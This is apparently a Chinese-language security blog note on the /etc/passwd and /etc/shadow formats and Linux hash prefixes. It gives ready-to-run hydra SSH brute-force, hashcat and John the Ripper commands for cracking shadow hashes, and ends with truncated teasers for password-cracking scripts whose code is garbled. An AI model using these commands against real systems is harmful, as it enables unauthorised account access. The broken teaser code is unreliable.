字段含義如下:
使用者名稱:口令:使用者標識號:組標識號:注釋性描述:主目錄:登入shell
eg:root:x:0:0:root:/root:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
mysql:x:117:125:mysql server,,,:/nonexistent:/bin/false
/etc/shadow:
字段含義如下:
eg:root:!:17043:0:99999:7:::
sshd:*:17043:0:99999:7:::
mysql:!:17048:0:99999:7:::
如果為空,則對應使用者登入時不需要口令;
星號代表帳號被鎖定;
雙嘆號表示這個密碼已經過期了;
$6$開頭的,表明是用sha-512加密;
$1$表明是用md5加密;
$2$ 是用blowfish加密;
$5$ 是用 sha-256加密;
hydra -l /root/desktop/使用者名稱.txt -p /root/desktop/密碼.txt -o /root/desktop/輸出.txt -e n -t 6 -vv -s 埠 192.169.14.129 ssh
注:-e n 測試空密碼
將shadow檔案裡含有密文資訊的字段儲存為文字進行破解。
/root/desktop/password.list為自定義字典
root@kali:~/desktop# ./hashcat-cli64.bin -m 1800 -a 0 -o found1.txt --remove /root/desktop/hascat_pass.txt /root/desktop/password.list
hashcat# 破密碼
root@kali:~/desktop#john /root/desktop/etc_shadow.txt
# 檢視破解後的密碼
root@kali:~/desktop#john /root/desktop/etc_shadow.txt --show
john the ripper使用方法概述
linux 系統中 /etc/passwd 和 /etc/shadow檔案詳解
python 弱口令暴力破解工具
環境 python 3.6.7 coding utf 8 import pymysql success false f user open username.txt r f pwd open password.txt r lines user f user.readlines 讀取出來是乙個列表 l...
破解root口令
今天小編示範如何破解root口令,以及進行grub加密後再次破解口令的實驗。一 三步破解root口令 流程 啟動系統時,設定其執行級別1,進入單使用者模式。編輯grub選單 選定要編輯的title,而後使用e命令 在kernel所在行,鍵入 b 命令,重啟後passwd直接修改root口令,就這樣快...
UNIX口令破解機
以下需要在linux系統執行 import crypt def testpass cryptpass salt cryptpass 0 2 取前兩個,沒用的,他們會置於加密後密碼的前面,我們不需要 dictfile open dictionary.txt r 存了所有簡單的密碼,一一試探 for w...